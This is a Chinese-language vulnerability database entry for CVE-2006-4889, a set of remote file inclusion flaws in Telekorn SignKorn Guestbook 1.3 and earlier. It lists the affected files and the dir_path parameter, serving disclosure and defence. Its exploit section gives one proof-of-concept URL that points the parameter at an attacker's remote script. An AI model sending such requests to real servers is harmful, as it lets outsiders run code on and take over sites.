Telekorn SignKorn Guestbook 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111001 漏洞类型 访问验证错误
发布时间 2006-09-12 更新时间 2006-09-22
CVE编号 CVE-2006-4889 CNNVD-ID CNNVD-200609-321
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/28541
https://cxsecurity.com/issue/WLB-2006090147
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-321
|漏洞详情
TelekornSignKornGuestbook(SL)中存在多个PHP远程文件包含漏洞,在启用register_globals时,远程攻击者通过以下文件的dir_path参数中的URL执行任意PHP代码:(1)index.php,(2)includes/functions.gb.php,(3)includes/functions.admin.php,(4)includes/admin.inc.php,(5)help.php,(6)smile.php,(7)entry.php;(a)help/en和(b)help/de目录中的(8)adminhelp0.php,(9)adminhelp1.php,(10)adminhelp2.php和(11)adminhelp3.php;以及(c)admin目录中的(12)preview.php,(13)log.php,(14)index.php,(15)config.php和(16)admin.php。
|漏洞EXP
source: http://www.securityfocus.com/bid/19977/info
                   
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
                   
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
                   
Versions 1.3 and earlier are affected by this issue.

http://www.example.Com/[Script]/admin/admin.php?dir_path=[U r Evil Script] ;
|参考资料

来源:XF
名称:signkorn-log-file-include(28888)
链接:http://xforce.iss.net/xforce/xfdb/28888
来源:www.telekorn.com
链接:http://www.telekorn.com/forum/showthread.php?t=1427
来源:BID
名称:19977
链接:http://www.securityfocus.com/bid/19977
来源:BUGTRAQ
名称:20060913SignkornGuestbook<=v1.3MultipleRemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/446086/100/0/threaded
来源:OSVDB
名称:32218
链接:http://www.osvdb.org/32218
来源:OSVDB
名称:32217
链接:http://www.osvdb.org/32217
来源:OSVDB
名称:32216
链接:http://www.osvdb.org/32216
来源:OSVDB
名称:32215
链接:http://www.osvdb.org/32215
来源:OSVDB
名称:32214
链接:http://www.osvdb.org/32214
来源:OSVDB
名称:32213
链接:http://www.osvdb.org/32213
来源:OSVDB
名称:32212
链接:http://www.osvdb.org/32212
来源:OSVDB
名称:32211
链接:http://www.osvdb.org/32211
来源:OSVDB
名称:32210
链接:http://www.osvdb.org/32210
来源:OSVDB
名称:32209
链接:http://www.osvdb.org/32209
来源:OSVDB
名称:32208
链接:http://www.osvdb.org/32208
来源:OSVDB
名称:32207
链接:http://www.osvdb.org/32207
来源:OSVDB
名称:32206
链接:http://www.osvdb.org/322